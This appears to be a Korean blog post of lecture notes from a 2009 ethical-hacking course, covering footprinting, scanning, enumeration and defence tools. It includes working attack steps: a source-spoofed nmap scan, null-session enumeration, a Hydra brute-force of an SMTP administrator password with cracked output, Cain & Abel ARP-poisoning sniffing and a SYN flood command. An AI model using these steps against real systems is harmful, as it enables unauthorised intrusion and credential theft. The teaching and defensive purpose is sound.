Module 1 - Information Security Overview

  • 학술적인 정의의 정보보안은 각종 위협으로부터 안전하게 보호하여 정보 시스템의 "기밀성", "무결성", "가용성"을 보장하는 것을 말한다.
  • Hacker 는 system 과 network 분야의 H/W, S/W 전문가를 지칭하는 의미로 고도의 전문 프로그래밍 실력을 가지고 합법적인 system, network 관리를 하는 사람을 의미합니다.
  • 전설적인 해커 Kevin Mitnick : 이론만으로 존재했던 IP Spoofing 공격을 실제로 공격에 사용한 최초의 해커로서 그의 실력을 입증하였다.
  • 해커의 분류 : Elite, Semi Elite, Developed Kiddie, Script Kiddie, 레이머
  • 보안 10대 불변 법칙

유용한 사이트
  • http://packetstorm.linuxsecurity.com - 익스플로잇
  • http://www.krcert.or.kr - 통계분석 메뉴
  • http://www.hackerwatch.org - 전세계 인터넷 트래픽 맵
  • http://www.zone-h.org - 메인페이지가 변조된 사이트들을 실시간으로 알려줌
  • http://www.hackersnews.org - 메인페이지가 변조된 사이트들을 실시간으로 알려줌

Module 2 - Attack Technique

  • 전통적인 공격기법
  1. 1단계 : 정보수집 -> 전체단계중 90% 이상을 차지한다.

  2. 2단계 : 시스템 침입
  3. 3단계 : 공격 전이

  • 공격기법 세분화
  1. Footprinting
  2. Scanning
  3. Enumeration
  4. Gaining Access
  5. Escalating Privilege
  6. Pilfering
  7. Covering Tracks
  8. Backdoor
  9. Denial of Service

Ping을 실행했을때, TTL 값이 128 근처이면 윈도우 운영체제이고 유닉스 계열 운영체제는 64 나 255 가 된다.


Module 3 - Footprinting

  • Social Engineering

    • 가장 쉬우면서도 가장 확실한 방법일 수 있는 것이 바로 이 사회공학 기법이다. 희대의 해커였던 케빈 미트닉은 기술 또한 우수했지만 이 사회공학 기법에 있어서 타의 추종을 불허한다고 한다.
    • 합법적인 사용자가 들어가는 데 바로 뒤에 붙어서 들어가려고 시도 (Piggybacking)
    • 휴지통 뒤지기
  • whois

whois는 인터넷에 등록된 domain에 대한 정보를 제공해주는 서비스이다. 이 서비스를 통해 master/slave name server 의 IP, 관리자의 전화번호를 비롯하여 email address, 기관의 지리적 위치, 할당 받은 IP Address, 최종 업데이트일자 등을 확인할 수 있다.


http://www.archive.org

http://www.ip-adress.com


Module 4 - Scanning

http://www.iana.org

http://insecure.org - NMAP (스캐닝)

http://www.wireshark.org - WireShark (패킷캡쳐), AirPcap - 아주 강력한 무선 해킹 툴


출발지 주소를 속이면서(IP Spoof) 해당 호스트 스캐닝 하기

  1. # nmap -v -sS -S 100.100.100.100 -e eth0 192.168.234.129

http://www.foundstone.com - Attacker


Portsentry (iptables 방화벽 연동)

step 1 : http://www.rpmfind.net --> portsentry 검색어 입력 검색

step 2 : wget ~~~

step 3 : rpm -Uvh portsentry ~~

step 4 : lokkit (방화벽활성화)

step 5 : iptables -F (기존 방화벽 rule 제거)

step 6 : service portsentry start

step 7 : 윈2000 에서 리눅스 스캔 (차단당하는지 확인)


Module 5 - Enumeration

윈도우즈 해킹을 위한 준비(스캐닝)


http://securityfocus.com/archive/

http://www.securiteam.com

http://sectools.org - Top 100 Network Security Tools

http://www.milw0rm.com

http://www.hackeroo.com

http://www.nessus.org - 가장 강력한 취약점분석 도구


Nikto - Web Server Scanner

http://www.securiteam.com --> search 에서 nikto 로 검색

http://www.cirt.net/code/nikto.shtml


http://www.watchfire.com/ --> AppScan 상용 웹스캐너


MD5SUM for Windows

http://www.pc-tools.net/win32/md5sums


Null Session 를 이용한 정보수집 방법

  1. c:> net use \\아이피주소\IPC$ "" /u:""
  2. c:> winfo 아이피주소 -v
  3. c:> userinfo \\아이피주소 Administrator


Hydra 를 이용하여 Administrator 비밀번호 알아내기

http://packetstorm.linuxsecurity.com/ 에서 Search 에 hydra 입력

hydra 다운로드

tar xvfz hydra-5.4-src.tar.gz

http://packetstorm.linuxsecurity.com/Crackers/wordlists/에서 passlist 다운로드

# cd hydra-5.4-src

# ./configure && make && make install

# ./hydra -l administrator -P /root/passlist 192.168.234.129 smtp-auth

Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2007-12-18 16:20:17
[DATA] 16 tasks, 1 servers, 5248 login tries (l:1/p:5248), ~328 tries per task
[DATA] attacking service smtp-auth on port 25
[25][smtpauth] host: 192.168.234.129   login: administrator   password: 12345
[STATUS] attack finished for 192.168.234.129 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2007-12-18 16:20:21



http://www.adventnet.com --> 공짜 로그서버 제공 (5개 서버까지 등록 가능) --> EventLog Analyzer 4


tripwire 설치

  1. # yum -y install tripwire
  2. # tripwire-setup-keyfiles

    # tripwire --init


  3. # tripwire --check



Unix 용 루트킷 검색 프로그램

http://www.chkrootkit.org --> chkrootkit

http://www.rootkit.nl --> rkhunter


Windows 용 루트킷 검색 프로그램

http://technet.microsoft.com --> sysinternals --> Securiy Utilities --> RootkitRevealer, Process Explorer


Sniffing Program

http://www.oxid.it/cain.html


카인과아벨를 이용한 스니핑 방법

Sniffer 탭 클릭 --> Configure 메뉴 --> 랜카드 선택, ARP 탭:가짜 IP, MAC 입력(59.28.225.180) --> Start Sniffer and Start ARP (두번째, 세번째 아이콘 클릭) --> 플러스 아이콘 클릭 --> All --> 모든 IP MAC 이 다 보이게 됨. --> 밑에 ARP 탭 선택 --> 플러스 아이콘 클릭 --> 스니핑하고자 하는 IP 선택  --> 스니핑 시작 --> Password 탭 선택하면 비밀번호가 보임



SYN Flooding Attack

syn 192.168.x.x -p 80

2009/08/25 14:29 2009/08/25 14:29

Trackback Address :: 이 글에는 트랙백을 보낼 수 없습니다